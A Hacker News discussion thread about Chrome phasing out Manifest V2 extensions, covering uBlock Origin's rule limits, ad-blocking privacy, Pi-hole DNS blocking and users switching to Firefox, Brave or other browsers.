| Once enough ads catch up with the new limitations. Right
| or wrong, we're still too early for that.
| pkasting wrote:
| > Explain to me how uBlock Origin can realistically go
| from 100,000 to 500,000 dynamic rules down to 30k
| rules(only 5k of those can be dynamic) in the Lite
| version without losing the ability to actually block
| everything?
|
| I will take this one.
|
| First, your limits are out of date. The static minimum is
| 30k, but can now escalate to an order of magnitude higher
| depending on how many extensions are installed. The
| dynamic limit is now 30k, of which at most 5k can be
| "unsafe". Source: https://developer.chrome.com/docs/exten
| sions/reference/api/d...
|
| Second, even if the limits were correct: consider the
| possibility that 99% of those rules are irrelevant, out
| of date garbage that blocks nothing anymore but haven't
| been removed because there is neither process nor
| incentive on the extension dev's part to do so.
|
| Ad uses pattern. UBO adds matching pattern. Ad switches
| to new pattern. Cat and mouse.
|
| This happens widely, rapidly, and on an ongoing basis.
| The result is that the rule set is large and grows
| rapidly, but very little of it is actually useful day to
| day. From the user's perspective, the only cost is that
| the browser very slowly gets continually less performant,
| which they will not attribute to the extension.
|
| This isn't hypothetical. I'm on the Chrome team. We
| analyzed the rule set contents. This is why we proposed
| the initial limits we did: they were plenty large enough
| to allow all the extensions we analyzed to do everything
| they actually wanted to do, if only you stripped the
| cruft.
|
| The rule size increases since then primarily come out of
| a dialog process with ad blocking devs about their
| process and needs and what they see in the wild coupled
| with what we think we can manage to keep performant.
| There are compromises. I'm not on that team so I can't
| speak to details. But it's part of an honest attempt to
| have a dialog.
|
| There are usually simple explanations for things, if
| people were truly willing to consider them without bias.
| crazygringo wrote:
| Thank you for providing this valuable explanation -- I
| haven't heard this perspective expressed elsewhere. The
| fact that old rules would never get deleted but continue
| to drain resources makes some design decisions make a lot
| more sense.
| pkasting wrote:
| One particularly pernicious outcome is that some ad
| blockers tout their rule set sizes as a feature, and
| users choose among blockers based on it, when if anything
| it is probably negatively correlated with blocker quality
| -- it's not necessarily a sign you're comprehensive so
| much as that you don't care about efficiency or cleaning
| up after yourself.
|
| That's of course an oversimplification. But people who
| believe they're technically knowledgeable and adept are
| just as likely as other folks to fall for bullshit and be
| convinced to do things contrary to their own self
| interests. It's just a different type of bullshit.
|
| No one wants to hear that, because we all want to tell
| ourselves that maybe everyone else is gullible, but WE'RE
| smart and rational. To a close approximation, though,
| none of us are.
| eviks wrote:
| Now consider that the extra drain can be practically
| zero, and you get back to those decisions making less
| sense
| tredre3 wrote:
| uBlock lite can accomplish 2, 3, 4 completely. It's only #1
| and #5 that are truly affected by v3. But those two were
| already pretty limited in chrominum browsers compared to
| firefox.
| Spunkie wrote:
| It can only accomplish #1 and #2 for 30k rules, most of
| which must de defined at the time of the extension
| release/update. As soon as that limit is exceeded an
| adblocker loses it's ability to accomplish #1, #2, #3,
| #4, or #5 effectively.
|
| And if we are being honest about those limits, they have
| already been exceeded. Ublock origin is going from
| 100,000 to 500,000 dynamic rules to just 30k rules(only
| 5k of those can be dynamic) in the lite version.
|
| Adblockers have absolutely been neutered in v3.
| eikenberry wrote:
| If I remember right then the difference is more about ad-
| tracking/privacy than blocking. V2 allowed UBO to find and
| intercept the calls to the ad servers before the calls were
| made. Where V3+UBL still makes the calls it just doesn't
| display the results. So while you might not see the ads, the
| ads see you.
| kuhsaft wrote:
| On the contrary, MV2 used onBeforeRequest which let
| extensions see what requests you were making. They could
| then take that data and use it for malicious purposes.
|
| MV3 doesn't allow extensions to know what requests are
| being made, so extensions can't use your data maliciously.
|
| Requests to ads that are blocked are blocked.
|
| I think you're thinking of Privacy-preserving ad
| measurement which is an option in Firefox and Safari.
| https://support.mozilla.org/en-US/kb/privacy-preserving-
| attr...
| GeoAtreides wrote:
| but op wasn't talking about what extensions are seeing,
| but what the ad servers do. You haven't address their
| point at all
| sunshowers wrote:
| Doesn't onBeforeRequest still exist in Manifest v3? The
| thing that's been removed is the ability to block on it,
| not the ability to register handlers for requests.
| kuhsaft wrote:
| It still exists, but now "ad blockers" can't use the
| blocking API to record and forward metrics on hits. Ad
| blockers don't even need the webRequest and
| webRequestBlocking permissions anymore.
|
| Now, if an ad blocker has webRequest permissions it's a
| red flag.
|
| For example https://developer.chrome.com/docs/extensions/
| develop/concept... uses webRequest to send telemetry back
| to some remote server.
| sunshowers wrote:
| Thanks, I see how that can help.
|
| With Manifest v3, let's say I'm an ad blocker and I want
| to get access to metrics not to violate privacy, but just
| to report them to the user (X domains blocked, Y out of Z
| requests blocked, etc). How would I get access to those
| metrics?
| kuhsaft wrote:
| Separate permission for debugging only available for
| development essentially.
| https://developer.mozilla.org/en-US/docs/Mozilla/Add-
| ons/Web...
|
| Otherwise, you can't really without more invasive
| permissions.
|
| https://stackoverflow.com/questions/74813523/chrome-
| extensio...
| sunshowers wrote:
| Oh wow, that's wild. Closing the loop on reporting things
| is such an important part of a trustworthy user
| experience.
| throwaway98346 wrote:
| > On the contrary, MV2 used onBeforeRequest which let
| extensions see what requests you were making. They could
| then take that data and use it for malicious purposes.
|
| Which is something we know for a fact uBlock Origin
| doesn't do. It's open source, you can check the code
| yourself. MV3, on the other hand, doesn't do much to
| assure me that an addon isn't phoning home. Why not just
| give the user to ability to block network requests on a
| per-addon basis? Too difficult a task for the trillion
| dollar company? Or could it be that forcing users to
| switch to MV3 addons isn't about safety at all?
| crazygringo wrote:
| > _Where V3+UBL still makes the calls it just doesn 't
| display the results. So while you might not see the ads,
| the ads see you._
|
| That's not what the docs say [1]: A single
| rule does one of the following: - Block a
| network request. - Upgrade the schema (http to
| https). - Prevent a request from getting blocked by
| negating any matching blocked rules. - Redirect a
| network request. - Modify request or response
| headers.
|
| Does "block" not mean block? Can you provide a source? Or
| am I looking at the wrong docs? I'm searching online and
| can't find anything that says the request is still sent.
|
| [1] https://developer.chrome.com/docs/extensions/reference/
| api/d...
| immibis wrote:
| The same Google that's currently in legal hot water for
| _always_ hiding its true motivations so effectively that even
| lawyers can 't get any relevant documents?
| BiteCode_dev wrote:
| Haven'y tested, is it blocking youtube ads?
| moooo99 wrote:
| Adblock doesn't only make Google Chrome bearable, it makes the
| internet bearable. I recently uninstalled my Adblock for
| testing purposes. Most websites nowadays are just ads with a
| little bit of text in between
| DataDive wrote:
| > _Hopefully this is the inflection point for Chrome._
|
| Here is one empirical data point.
|
| I switched over to Firefox this morning and will advocate for
| it.
|
| I've considered it for a while, but I never felt motivated to
| make the switch. It took me a good half hour to set it up the
| way I like it.
| heelix wrote:
| This is sort of like planting trees. I cut bait on chrome
| when they first announced they were dropping/impacting
| adblockers. For the most part, things are good enough the
| only time I spin up chrome is confirming something renders as
| expected on a personal site. Firefox works well enough for
| streaming and surfing.
| karaterobot wrote:
| I'd like to think that's true, but I don't know, because people
| seem to have a very high tolerance for advertisements.
| Surprisingly so. I have a very low tolerance, and do what I can
| to get rid of them. But then, every once in a while I use
| someone else's computer and see how they live with them. I say
| "I can show you how to get rid of those ads," but they usually
| just don't care enough to do it. I bet the majority of people
| are like that--maybe the vast majority--and Google is probably
| making the same bet, but with even more information. My
| prediction is that if (God willing) Chrome loses significant
| market share, it'll be for some other reason than this.
| kmlx wrote:
| > making adblock less effective
|
| adblocking still works just fine on Safari, which has been
| doing the same thing as Manifest V3 for years now.
| timeon wrote:
| Ad-blockers are not just about displaying the actual ads.
|
| Does the Chrome blocks trackers even without ad-blocker Like
| Safari?
| yupyupyups wrote:
| Yeah, I don't browse the web without an ad blocker.
| wooque wrote:
| I'd argue it won't make a dent in Chrome market share.
|
| People who really care about this (tech minded people) are not
| using Chrome anyway, others (regular people) will switch to
| less powerful Manifest V3 adblockers that would probably be
| good enough and won't switch from Chrome.
| throwaway48476 wrote:
| So, are you going to leave chrome then?
| spankalee wrote:
| What makes you say the security reasons are made up?
| Zak wrote:
| I can take this question.
|
| They removed webRequestBlocking, used mainly by adblockers,
| but left webRequest. The security implications are the same
| for both, but only the former is optimized for content
| blocking.
| ragnese wrote:
| The vast, _vast_ , majority of normies I know use Google Chrome
| and use zero extensions.
| mossTechnician wrote:
| I've been checking browser stat counters religiously, looking
| for evidence that this change is driving their numbers down. No
| luck so far.
|
| Am I missing any? https://gs.statcounter.com
| https://analytics.usa.gov https://www.w3counter.com
| matheusmoreira wrote:
| Manifest v3 changes are pretty reasonable. Declarative
| filtering that prevents untrustworthy software from getting
| access to data is objectively a good thing.
|
| It's just that uBlock Origin is so important and trusted it
| should have access to everything. Truth be told it should be
| literally built into the browser itself and deeply integrated
| with it. Only conflicts of interest prevent that. Can't trust
| an ad company to maintain ad blockers after all.
| Mrdarknezz wrote:
| Totally unrelated, firefox is an excellent browser
| zb3 wrote:
| But not when you want to install GrapheneOS using the web-based
| installer, because Mozilla refuses to implement WebUSB
| contravariant wrote:
| Sounds like a reasonable trade-off.
|
| I imagine they couldn't figure out what an appropriate
| warning window would look like for that kind of protocol.
| teruakohatu wrote:
| Chrome supports WebUSB. The bowser asks if you want to
| connect a device and presents a list of supported devices.
| It works amazingly well.
| ck2 wrote:
| Time to try Supermium again, I couldn't get it to install using
| my Chrome profile last time, maybe fixed by now.
|
| Unless Supermium is following the manifest path too? Doubt it.
|
| https://en.wikipedia.org/wiki/Supermium
| greenie_beans wrote:
| can i just setup dns blocking on my network to block the ad
| requests? especially on youtube, ublock origin stopped working a
| few weeks ago.
| WesolyKubeczek wrote:
| Not enough, especially since your browser may weasel out of it
| by using its own DNS via DoH.
| surajrmal wrote:
| Are you aware of any that do this? I've been using pihole for
| years and have no complaints. I've only seen smart TVs seem
| to do this, although it's usually configurable.
| WesolyKubeczek wrote:
| One example that I was remembering was Chromecast. It
| needed Google DNS to work at all.
|
| In general, though if an app sticks to "known good" DNS
| over HTTPS and pins its certificate to boot, it will bypass
| DNS-based adblocking very easily, and additionally will
| punish you by not working at all if you try to do any
| firewall/routing trickery.
| sunshowers wrote:
| So yes... but the issue with DNS blocking is in the exceptions.
|
| First, exceptions are at the domain level. So you can't say
| "allow this domain on this site", you have to blanket-allow a
| domain or not.
|
| Second, the UX for making exceptions isn't great. With uBO it's
| just a couple of clicks. With something like Pi-hole it's more
| complex: https://discourse.pi-hole.net/t/how-do-i-whitelist-or-
| blackl...
| WesolyKubeczek wrote:
| I wish some brave enough (no relation to Brave) soul patched
| Blink so it became possible to delegate URL blocking decisions to
| an external process via some sort of IPC. In goes a full URL and
| maybe an opaque session ID so some state may be tracked, out goes
| a boolean value. Assume all are allowed if this process cannot be
| connected to.
| userbinator wrote:
| You can already do this with a MITM proxy, and it works in all
| browsers.
| jakeogh wrote:
| Bypassing pinned certs is always going pass attention? (or
| whatever deliberately harder to lookup term they make up?)
|
| https://news.ycombinator.com/item?id=41813480
|
| https://m.youtube.com/watch?v=F8cT1YCsxgo
| wbadart wrote:
| I thought this was a cool idea, so I looked around for
| existing implementations and found
| https://github.com/barre/privaxy
|
| Been a while since the last commit, so I'm not sure if it's
| maintained, but I might try adding it (or something similar)
| to my pihole.
| lemagedurage wrote:
| For people who want to stick with a Chrome-based browser while
| still using the full-featured uBlock Origin: Brave will keep
| supporting uBlock Origin even after Manifest V2's removal from
| Chromium.
|
| https://brave.com/blog/brave-shields-manifest-v3/
| the_gipsy wrote:
| For how long, though? And what will be the next marketing scam
| after crypto/tokens? Something with AI?
| ParetoOptimal wrote:
| Note that Brave's creator opposes same sex marriage, is a
| Coronavirus "skeptic", and his silly cryptocurrency is made to
| work with brave browser.
| gabrielsroka wrote:
| Brave's creator, B. Eich, also created JavaScript, so I
| assume you have that disabled everywhere.
| timeon wrote:
| Oh I wish.
| rjh29 wrote:
| Yes, he created an absolutely terribly designed language
| that we're still dealing with today. That is not a good
| thing.
| sunaookami wrote:
| >opposes same sex marriage
|
| That's not true, he donated to organizations supporting
| California Proposition 8 which banned same-sex marriage which
| by the way was supported by the _majority_ back then in
| California. That was also 16 years ago, it 's time to let it
| go and stop spreading misinformation. You should instead not
| rely on ad-hominem and critize Brave for being ridden with
| cryptocurrency and doing shady stuff.
| Dylan16807 wrote:
| Do you have any evidence his opinion has changed? If you
| don't, then it's not misinformation, and no you don't get
| to demand people "let it go" because it was 16 years ago.
|
| And donating to a specific cause shows a lot more
| commitment and understanding than a typical vote.
| jovial_cavalier wrote:
| I don't care.
| PKop wrote:
| Nothing wrong with any of those positions. And largely
| irrelevant to whether he's good at his job and whether Brave
| is a good browser which it is for various reasons, one of
| which being he leads the company.
| grounder wrote:
| Brave browser should probably not be trusted. They violated
| basic trust by redirecting URLs to their own affiliate links
| for those URLs. That is pretty bad.
| https://www.theverge.com/2020/6/8/21283769/brave-browser-aff...
| bdcravens wrote:
| Anyone using a PiHole to block on their network? I've been aware
| of it, but honestly, ad blocking was good enough that I didn't go
| down that route. Is PiHole good enough? Is there a big problem
| with false positives?
| surajrmal wrote:
| Id argue pihole is roughly equivalent to what you can do with
| manifest v3 based afld blockers. I use it as my primary ad
| blocker as well, and don't really understand why folks are
| upset about losing V2 that much. It seems like removing root in
| favor of more granular permissions which is generally a good
| thing.
| shbooms wrote:
| I agree that more granular permissions is better (in terms of
| dictating which sites an extension has access to) but I think
| the main problem as I understand it is that this is an
| entirely seperate issue from the one that nukes uBO.
|
| V3 introduces a hard limit on the total number network
| filters an extension is allowed to set and it's a laughably
| low number. Far below what uBO uses even on a barebones,
| default setup
| Dylan16807 wrote:
| There was already a specific permission for messing with raw
| network requests.
|
| v3 removes the ability to block, but not the ability to
| monitor. It doesn't make anything more granular.
| kstrauser wrote:
| Yep, and it's great. Beyond ads, you can also configure it to
| block malware. Got a phishing email from scammer.ru? Nothing
| happens even if you to click the link in it because that name
| won't resolve. There were a very short list of exceptions,
| maybe 2 or 3, I had to add to ours over the years, mainly for
| hostnames like tracking.shippingcompany.com that got added by
| mistake.
|
| Note that it does nothing to block DNS over HTTPS lookups. If
| your browser insists on going around your LAN's DNS setup, Pi-
| hole can't help you.
| bberrry wrote:
| It can't handle YouTube ads unfortunately.
| matthewcford wrote:
| I'm using nextdns - happy with it.
| lapcat wrote:
| This submission title does not appear to be accurate. Here's what
| was actually said:
|
| > October 9th 2024: an update on Manifest V2 phase-out.
|
| > Over the last few months, we have continued with the Manifest
| V2 phase-out. Currently the chrome://extensions page displays a
| warning banner for all users of Manifest V2 extensions.
| Additionally, we have started disabling Manifest V2 extensions on
| pre-stable channels.
|
| > We will now begin disabling installed extensions still using
| Manifest V2 in Chrome stable. This change will be slowly rolled
| out over the following weeks. Users will be directed to the
| Chrome Web Store, where they will be recommended Manifest V3
| alternatives for their disabled extension. For a short time,
| users will still be able to turn their Manifest V2 extensions
| back on. Enterprises using the ExtensionManifestV2Availability
| policy will be exempt from any browser changes until June 2025.
| See our May 2024 blog for more context.
| wtallis wrote:
| They said "we have started disabling Manifest V2 extensions on
| pre-stable channels", and the "Chrome canary" referenced in the
| submission title is a pre-stable channel. The submission title
| is accurate, but narrowly highlighting only one facet of
| Google's update statement.
| lapcat wrote:
| That's old news, as noted in my other comment:
| https://news.ycombinator.com/item?id=41810420
|
| The change here is actually about the stable channel.
|
| Also, the title makes it sound like MV2 code has been removed
| from the source, but that's not the case.
| wtallis wrote:
| > That's old news, as noted in my other comment:
|
| None of your comments have actually provided evidence for
| this assertion, and the previous update dated June 3rd 2024
| says users will start seeing a _warning_. So when between
| June 3 and October 9 did Google start actually disabling
| MV2 extensions, and where was it publicized prior to their
| October 9 update?
| lapcat wrote:
| > None of your comments have actually provided evidence
| for this assertion
|
| It's not an assertion. It's simple reading comprehension.
| How else can you interpret this?
|
| "Over the last few months, we have continued with the
| Manifest V2 phase-out. Currently the chrome://extensions
| page displays a warning banner for all users of Manifest
| V2 extensions. Additionally, we have started disabling
| Manifest V2 extensions on pre-stable channels. [paragraph
| break] We will _now_ [emphasis mine] begin disabling
| installed extensions still using Manifest V2 in Chrome
| stable. "
|
| > So when between June 3 and October 9 did Google start
| actually disabling MV2 extensions, and where was it
| publicized prior to their October 9 update?
|
| I don't know if it was publicized, until now.
|
| After all, when did they publicize that there would be a
| warning in Chrome stable? But there _is_ a warning in
| Chrome stable. That started happening some time before
| this announcement.
|
| Four months is a long gap between announcements.
| wtallis wrote:
| > I don't know if it was publicized, until now.
|
| So you literally don't know if it was _news_ before now,
| but you 're insisting on calling it "old news",
| apparently based solely on Google using past tense in
| their announcement.
| lapcat wrote:
| > So you literally don't know if it was news before now,
| but you're insisting on calling it "old news"
|
| That was just a figure of speech, which I don't wish to
| quibble over. I don't insist on using that phrase. The
| point, from the beginning, is that the HN submission
| title is not good.
|
| It actually doesn't matter when exactly that Google began
| disabling MV2 extensions in Chrome canary, because what's
| the justification for focusing on canary in the
| submission title when the announcement says, "We will now
| begin disabling installed extensions still using Manifest
| V2 in Chrome stable"?
|
| [EDIT:] I see that the submission title has now indeed
| been changed, so this argument has become redundant.
| EasyMark wrote:
| But still it's the first stab wound inflicted on
| CaesarMainline, he's toast
| freedomben wrote:
| The most relevant part is:
|
| > _Additionally, we have started disabling Manifest V2
| extensions on pre-stable channels._
|
| Title could have been a bit more broad (probably should say
| "pre-stable" instead of "canary"), but I would say it is
| inaccurate.
| lapcat wrote:
| > The most relevant part is:
|
| That's actually _not_ the most relevant part. The most
| relevant part is "We will now begin disabling installed
| extensions still using Manifest V2 in Chrome stable. This
| change will be slowly rolled out over the following weeks."
|
| Google had _already_ started disabling Manifest V2 extensions
| on pre-stable channels, prior to October 9.
|
| The first paragraph is "what we've been doing." The second
| paragraph is "what we'll do now."
| dang wrote:
| Ok, I've replaced the title with that language from the article
| (shortened a bit to fit HN's 80 char title limit). Thanks!
|
| Submitted title was "Manifest v2 is now removed from Chrome
| canary"
| sunaookami wrote:
| Adblockers are my least concern, a lot of other useful add-ons
| won't work, like Imagus, Redirector, Violentmonkey, etc. So I
| switched to Firefox a few months ago.
| Gimpei wrote:
| What does this mean for browsers derived from chrome, like Arc? I
| heard they plan on continuing to support Manifest v2, but will
| ublock continue to be maintained for chrome?
| paulryanrogers wrote:
| MV2 code should remain well into 2025 since enterprises can
| still enable MV2 extensions. After that they may have to hard
| fork, which could become increasingly costly. Though they could
| coordinate to minimize duplicated efforts.
| noname120 wrote:
| https://resources.arc.net/hc/en-us/articles/25540117353623-W...
| pentagrama wrote:
| > Users will be directed to the Chrome Web Store, where they will
| be recommended Manifest V3 alternatives for their disabled
| extension.
|
| I'm curious about which extensions will be recommended to replace
| uBlock Origin after it's disabled. I'm sure those alternatives
| will see a surge in installs.
|
| Also, why doesn't the creator of uBlock Origin update the V2
| version to the V3 version? I know V3 version isn't as good as V2,
| but if you're developing that product, at least give your users
| something instead of leaving them with nothing. Otherwise, they
| may end up choosing poor alternatives.
| tredre3 wrote:
| Everything you said has already been done:
| https://chromewebstore.google.com/detail/ublock-origin-lite/...
| pentagrama wrote:
| This V3 version will be pushed as a regular update on the
| current V2 version before is disabled? I think that must be
| done now to avoid even the alerts on users.
| dtgm92 wrote:
| I will recommend Librewolf. Default Firefox has a lot of garbage
| and bloat.
| OptionOfT wrote:
| I am tied to Microsoft Edge for sync between desktop and phone,
| and Microsoft Edge on iOS has AdBlock built in. But looking at
| this it seems inevitable that Edge will retain V2.
|
| As to switching to Firefox? I'd love to, but Firefox on iOS
| refuses to put in an AdBlocker. Yea, you can use Firefox Focus
| but that one doesn't sync.
|
| I don't understand Mozilla's stance on this.
| throwaway48476 wrote:
| Firefox doesn't exist on iOS, it's just reskinned safari. It's
| not Mozillas fault that Apple won't let you install a different
| web engine.
| OptionOfT wrote:
| Edge on iOS, which is also reskinned Safari, has AdBlock Plus
| integrated.
|
| So it IS possible.
| throwaway48476 wrote:
| Safari allows some ad blocking but nothing close to ublock.
| pavon wrote:
| AFAIK, Microsoft is disabling manifest V2 extensions in Edge
| following the same timeline as Chrome[1]. Brave is continuing
| to run V2 extensions, but has no plan to stand up their own
| extension store[2], so it isn't clear how users will get the
| extensions, beyond a few handpicked ones that Brave is
| supporting[3].
|
| [1] https://learn.microsoft.com/en-us/microsoft-
| edge/extensions-...
|
| [2] https://github.com/brave/brave-browser/issues/15187
|
| [3] https://github.com/brave/brave-browser/issues/28367
| int_19h wrote:
| Take a look at Vivaldi, as well - it covers all major desktop
| and mobile platforms now and syncs across all of them through
| their own servers, and it also has integrated adblock.
| imbnwa wrote:
| Why is this thread not on the first 4 or 5 pages of HN?
| instagib wrote:
| Down weighted? Happens when mods see too many comments and not
| enough upvotes.
| imbnwa wrote:
| Ah
| dang wrote:
| Recent and related:
|
| _Chrome Canary just killed uBlock Origin and other Manifest V2
| extensions_ - https://news.ycombinator.com/item?id=41757178 - Oct
| 2024 (46 comments)
|
| That one never made the frontpage, so I'm leaving the current
| thread up.
| bijection wrote:
| I've finally switched (back) to firefox today.
|
| I switched from firefox to chrome for their superior devtools a
| few years back, but hopefully firefox has had time to catch up.
|
| Everything old is new again!
| echelon wrote:
| This is why we need to break up Google.
|
| Google is a de facto monopoly. They own the entire web. The
| gateway, the browser, the protocols, advertising, discovery.
|
| Google is too big.
| ragnese wrote:
| Sure, but we saw this coming a mile away (as in, people have
| been saying this about Chrome for about a decade). People--
| especially tech nerds--didn't have to switch to the closed
| source, conflict-of-interest, browser. But, everyone did, and
| this is what we get for it. We now have proprietary DRM built
| in to the web standards, and all kinds of other bullshit,
| because a bunch of people decided to not learn any lessons at
| all from Microsoft and Internet Explorer.
|
| But, every time Mozilla does something _slightly_ abrasive,
| HN users pile on about how Mozilla is ruining their privacy-
| respecting reputation, and then go back to using Chrome...
| The double-standard is really something else.
|
| Maybe instead of getting someone else to break up Google for
| us, we could just... stop using their shit? I'm typing this
| from Firefox, I use Proton Mail (and pay for it!) for email,
| and I mostly search with DuckDuckGo (I know that's not
| perfect, either). I certainly don't _feel_ like I 'm living
| like a caveman...
|
| /rant
| ilrwbwrkhv wrote:
| > tech nerds you would be surprised how many devs these
| days have drunk the big tech coolaid.
|
| leetcode all the time and dream of working at google and
| using chrome and writing javascript.
|
| if the tech nerds took a stand and used firefox en masse,
| we wouldn't have this problem.
|
| unfortunately it is now normie season. we have to travel
| through these dark times.
| ragnese wrote:
| There's still hope. I would like to draw a parallel to
| Microsoft Windows, with my own narrative added over.
|
| Tech nerds mostly knew that Windows was not a good server
| operating system. It was also not a fantastic software
| development environment unless you were using a big, all-
| inclusive, IDE that was _probably_ aimed specifically at
| developing Windows libraries and applications.
|
| But, Windows was (and still is) the choice for normies by
| a WIDE margin.
|
| The tech nerds continued to mostly ignore Windows for
| server stuff, and more and more ignored it for other dev
| stuff, too (many migrating to Macs, some to Linux, etc).
|
| If you have a lot of users, but no developers on your
| platform, you're playing a dangerous game. Eventually
| Microsoft found a way to have Linux running in Windows. I
| don't know or care if that "saves" Microsoft or Windows
| or whatever, but I do see that as a win for the tech
| nerds.
|
| All we have to do is get the tech nerds to stop using
| Chrome. Chrome can't survive forever if the nerds stop
| using Chrome, if we stop optimizing our web pages
| specifically for Chrome, and if we stop writing and
| maintaining extensions for it.
|
| Eventually, they'll probably cave and put back more stuff
| to make the nerds happy, in order to bring them back to
| the platform and save their normie userbase. Either that
| or Chrome will die. Both are fine with me.
| ilrwbwrkhv wrote:
| > All we have to do is get the tech nerds to stop using
| Chrome. Chrome can't survive forever if the nerds stop
| using Chrome, if we stop optimizing our web pages
| specifically for Chrome, and if we stop writing and
| maintaining extensions for it.
|
| Agreed 100% with this.
| AdamJacobMuller wrote:
| Google made something better than what existed with Chrome,
| it was obvious it would capture the market significantly
| especially among more technical people.
|
| I don't think the fact that Chrome is (was) better is the
| question, it's a question of how they got here.
|
| Google took tons of money and threw it into Chrome and
| therefore developed something better. It's better because
| Google put more money into it than anyone else would have
| because, in the absence of considering using it to enshrine
| their search and ad revenue, it wouldn't make sense.
|
| Isn't this part of the antitrust test?
| ragnese wrote:
| It was only true that Chrome was significantly superior
| (performance-wise, anyway) for a little while. Firefox
| had to play catch up and it took several years. It was
| (mostly) called the "electrolysis" (a.k.a., "e10s")
| project. It was considered complete by 2018, and had
| already offered significant performance and stability
| improvements for years before then.
|
| I wouldn't be surprised if Chrome still performs better
| on Google-owned web sites, for obvious reasons. But,
| nobody is really going to notice a difference between
| Firefox and Chrome when visiting, e.g., your bank's web
| site.
|
| So, it's been somewhere between six and eight years that
| Firefox has had comparable performance, comparable web
| dev tools, and way cooler extensions. I'm sure plenty of
| people will reply that this isn't true and there was some
| website just this week that FORCES them to stay with
| Chrome because they noticed a jitter once, but people on
| the internet are top-tier experts at rationalizing and I
| don't buy it.
|
| We could've all jumped on board with Firefox when the
| e10s project landed, but nobody did because it was just
| slightly less convenient to switch than to not. I hope it
| was worth it for them.
| genocidicbunny wrote:
| > I wouldn't be surprised if Chrome still performs better
| on Google-owned web sites, for obvious reasons.
|
| Most websites (except for those doing some really fancy
| stuff with new experimental web apis) tend to work just
| fine in Firefox. Google's sites are the only ones I
| regularly encounter that perform terribly and leak memory
| continuously.
| aftbit wrote:
| The one that is the worst for me is Google Cloud console.
| It takes tens of seconds to update page state when trying
| to create or edit resources in Firefox, especially
| anything in Compute Engine. Chrome feels reasonably
| snappy, at least as good as AWS's console. I'm not sure
| who is to blame for that but I use `chrome-new` to log
| into Google Cloud when I need to.
| Uvix wrote:
| Chrome had better stability (not sure about performance)
| for nearly a decade - far more than "a little while". I
| gave Mozilla 3-4 years to catch up before finally
| switching to Chrome.
|
| Even once e10s supposedly fixed their problems another 4
| years down the road, I didn't see any reason to rush
| back. I've switched to another Chromium browser, but I'd
| rather try a new engine entirely like Ladybird than
| switch back to Mozilla, until they prove they're not
| going to let the browser stagnate for so long again.
| eastbound wrote:
| Imagine browsing the web without an adblock. A single ad
| can consume 1GB in 5 minutes on my mobile phone. The CPU
| will be super slow. We often underestimate the loss of
| performance that ads represent.
|
| Well, that's going to be Chrome from now on.
| mort96 wrote:
| Meh, the "slightly abrasive" stuff Mozilla is doing is
| stuff like buying up ad analytics companies and adding
| features to help ad tracking companies track users. Fuck
| Mozilla, and fuck Google even more.
|
| I admire your optimism by the way that a few technologists
| saying "stop using Chrome, Google is evil, use Firefox" is
| enough to overcome the market dominance of a monopoly like
| Google's, but I sadly don't share it. People have been
| saying it (and similar things, like "don't use Windows,
| Microsoft is evil, use Linux") for decades with little
| success. Even the few people who do get swayed will switch
| back after a few instances of "I was late for my important
| meeting/was unable to open this important document because
| the website didn't work with Firefox".
|
| Most people's tech choices are deeply pragmatic and based
| on familiarity. And to expect anything else is honestly
| foolish, in my opinion.
|
| This is coming from a Firefox and Linux user by the way.
| Dalewyn wrote:
| >"stop using Chrome, Google is evil, use Firefox" is
| enough to overcome the market dominance of a monopoly
| like Google's
|
| That is exactly how Firefox slew Internet Explorer.
| r00fus wrote:
| > People--especially tech nerds--didn't have to switch to
| the closed source, conflict-of-interest, browser.
|
| Do you not remember all the ads promoting chrome? First was
| chrome-frame IE extension, then came all the ads - then
| tie-ins where you got Chrome in addition when you really
| wanted some other app.
|
| They pushed it hard because they knew they had no real
| competitors and could eat up marketshare.
| Dalewyn wrote:
| Chrome won because it was more performant (read: only
| point of interest for Joe Average) and it was modern and
| cool (read: only point of interest for nerds).
|
| Firefox failed because it stagnated on performance and
| code quality (read: memory leaks for daaaaaaaaays) and
| ultimately because Mozilla was corrupted by Mitchell
| Baker and still is to this very day driving away nerds
| and engineers by the truckload.
|
| Lest we forget, Internet Explorer lost to Firefox despite
| bundling with Windows. Edge still loses to Chrome despite
| bundling with Windows. Safari despite bundling with iOS
| and MacOS only survives thanks to the Walls of
| Applestantinope holding against the SelEUk Empire's
| onslaught.
| fatihpense wrote:
| Thanks for the unexpected laugh at the end. Maybe there
| is a typo in that imaginary world: "Applestantinople".
| But maybe it is as intended :)
| Dalewyn wrote:
| I didn't even notice that. lmao
| the_gorilla wrote:
| > Chrome won because it was more performant (read: only
| point of interest for Joe Average)
|
| It's hard to argue chrome won on merit here when they
| were using their monopoly to actively sabotage users
| running firefox on the most popular sites.
|
| > YouTube page load is 5x slower in Firefox and Edge than
| in Chrome because YouTube's Polymer redesign relies on
| the deprecated Shadow DOM v0 API only implemented in
| Chrome
| roca wrote:
| Google spent astronomical amounts of money advertising
| Chrome, including pushing Chrome from literally priceless
| Web real estate like the Google start page, bundling
| deals with e.g. Flash, and preinstalls on various
| desktops and laptops. It really is hard to say what would
| have happened without that advantage.
| jakubmazanec wrote:
| But it has been few years since Firefox got the Quantum
| update, and now much more memory efficient than Chrome.
| endgame wrote:
| I criticise Mozilla in tech circles, I recommend Firefox
| and a working adblocker to friends and family, and I donate
| to Ladybird. What else should I be doing?
| chii wrote:
| unfortunately, there's not much else you get to do. With
| the exception of the anti-trust suits on google coming
| out with a decent outcome (which i wouldn't hold my
| breath for), there's little that individuals can do to
| push back against google's might.
|
| If you're in a position of power in a corporation to
| dictate software usage, consider making firefox the
| default choice.
| ttt3ts wrote:
| IMO they are still not as good although they have improved. I
| just develop in chrome and use Firefox for everything else.
| KTibow wrote:
| What makes them less good? I'm used to Firefox and while the
| Chrome devtools have more features they're harder to use (eg
| smaller touch targets, can't accept JS suggestion with enter
| key)
| tonightstoast wrote:
| I use FF and my coworker uses Chrome. He says the thing
| that pisses him off the most when watching me use FF is
| that there is no fuzzy search when manually applying
| styles. I.e. you have to search "justif..." to see
| "justify-self". You can't just search "self". That's the
| only example I've really noticed between the two but I'm
| sure there are more. It doesn't bother me enough to change
| though.
| knowitnone wrote:
| Same. I use Chromium for dev and firefox for browsing
| ezst wrote:
| I know chrome dev tools are capable, but to me they feel much
| more dumb and convoluted. There's lots of convenience and
| golden nuggets in Firefox dev tools that makes you feel
| they've been designed by and for developers.
| Jach wrote:
| My needs for webdev debugging have always been satisfied by
| Firefox, but last time I was really in the weeds ~4 years
| ago I had the feeling both it and Chrome were still missing
| things I took for granted with Firebug long ago.
|
| I don't mind nice and powerful tools, but one thing I
| learned with Java (where the tools are so much nicer and so
| much more powerful) is that if you're leaning on them
